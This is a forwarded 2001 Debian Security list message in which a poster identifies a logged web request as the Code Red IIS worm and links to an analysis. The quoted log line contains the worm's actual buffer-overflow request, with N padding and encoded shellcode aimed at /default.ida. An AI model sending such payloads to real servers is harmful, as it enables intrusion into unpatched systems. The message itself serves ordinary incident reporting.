Here you go ... ----- Forwarded message from "Noah L. Meyerhans" <[EMAIL PROTECTED]> ----- Resent-Date: Thu, 19 Jul 2001 17:07:27 -0700 (PDT) Delivered-To: [EMAIL PROTECTED] X-Envelope-Sender: [EMAIL PROTECTED] Date: Thu, 19 Jul 2001 18:54:31 -0400 To: Debian Security List <[EMAIL PROTECTED]> Subject: Re: CGI Buffer Overflow? User-Agent: Mutt/1.2.5i In-Reply-To: <[EMAIL PROTECTED]>; from [EMAIL PROTECTED] on Thu, Jul 19, 2001 at 05:17:26PM -0400 From: "Noah L. Meyerhans" <[EMAIL PROTECTED]> Resent-Message-ID: <NKZq7C.A.rV.AV2V7@murphy> Resent-From: [EMAIL PROTECTED] X-Mailing-List: <[EMAIL PROTECTED]> archive/latest/3334 X-Loop: [EMAIL PROTECTED] Precedence: list Resent-Sender: [EMAIL PROTECTED] On Thu, Jul 19, 2001 at 05:17:26PM -0400, Brian Rectanus wrote: > xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET > /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9 > 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0 > 078%u0000%u00=a HTTP/1.0" 400 328 This is an IIS worm. It's running wild today...and I do mean wild. My server has seen about 10 requests for it today. It's known as the Code Red worm. There some analysis of it at http://www.eeye.com/html/advisories/codered.zip If you're running IIS, be worried. Otherwise it's nothing. noah -- _______________________________________________________ | Web: http://web.morgul.net/~frodo/ | PGP Public Key: http://web.morgul.net/~frodo/mail.html ----- End forwarded message -----
